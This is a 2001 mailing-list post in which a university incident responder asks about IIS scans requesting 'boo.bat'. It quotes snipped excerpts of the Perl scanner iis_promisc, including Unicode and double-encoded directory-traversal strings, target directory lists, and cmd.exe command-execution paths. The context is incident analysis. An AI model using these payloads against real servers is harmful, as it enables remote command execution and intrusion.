Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

Re: iis scanning

From: Jordan K Wiens <jwiens () nersp nerdc ufl edu>
Date: Mon, 2 Jul 2001 15:24:15 -0400 (EDT)
Since the security focus page doesn't actually list the source, I'll quote
the relevant parts below.

For those of you who are curious (I was) someone found me the translation
of MinhaNossaSenhoraDoPerpetuoSocorro.  It means Our Lady of Perpetual
Help, referring to Mary.  Interesting invocation to hack under.

-- 
Jordan Wiens
UF Network Incident Response Team
(352)392-2061

On Mon, 2 Jul 2001, Jordan K Wiens wrote:


Anyone seen an iis scan that attempts to access boo.bat among other
requests along with directory traversal attempts?  I found the source of
the script on the web but no mention is made of what boo.bat is included
for.  Anyone know what this is?

http://www.securityfocus.com/tools/2060







-----------IIS_PROMISC EXCERPTS----------------
#!/usr/bin/perl
#
# iis_promisc v2.0
#
# This is a perl script to test the infamous
# Microsoft IIS holes:
#
# -*- Escaped Characters Decoding Bug
# -*- Unicode Directory Transversal Bug
#
# * Support Proxy Server
# * Over 20 tests will be made ( if found display the patch URL too :)
#
# Added to v2:
#
# -*- Executable File Parsing Bug check
# -*- Over 40 bugs tested! 
#
# * REQUIRE LWP(Lib WWW for Perl) http://www.linpro.no/lwp/ 
#   The package libwww is found in many linux distributions
#
# by inode () unsekure com br
# greetz to #unsekure @ irc.brasnet.org
# http://unsekure.com.br
#
# 05/2001

.
. [SNIP]
.

$test_command = "winnt/system32/cmd.exe?/c+echo+MinhaNossaSenhoraDoPerpetuoSocorro";
$dir_command = "winnt/system32/cmd.exe?/c+dir";
$iis = "1";

my @dir=(

# You can add more exec dirs here
#"/somedir/",

"/", ## wwwroot
"/scripts/",
"/msadc/",
"/cgi-bin/",
"/bin/",
"/samples/",
"/_vti_cnf/",
"/_vti_bin/",
"/adsamples/",
"/iisadmpwd/",
"/Rpc/",
"/PBServer/");

my @string=(

"..%255c..%255c..%255c..%255c..%255c..%255c",
"..%c0%af../..%c0%af../..%c0%af../",
"..%e0%80%af../..%e0%80%af../..%e0%80%af../",
"boo.bat/..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C");

.
. [SNIP]
.

And the rest is pretty straight forward.  Nothing too tricky.





----------------------------------------------------------------------------


This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see:

http://aris.securityfocus.com
Previous By Date Next
Previous By Thread Next

Current thread: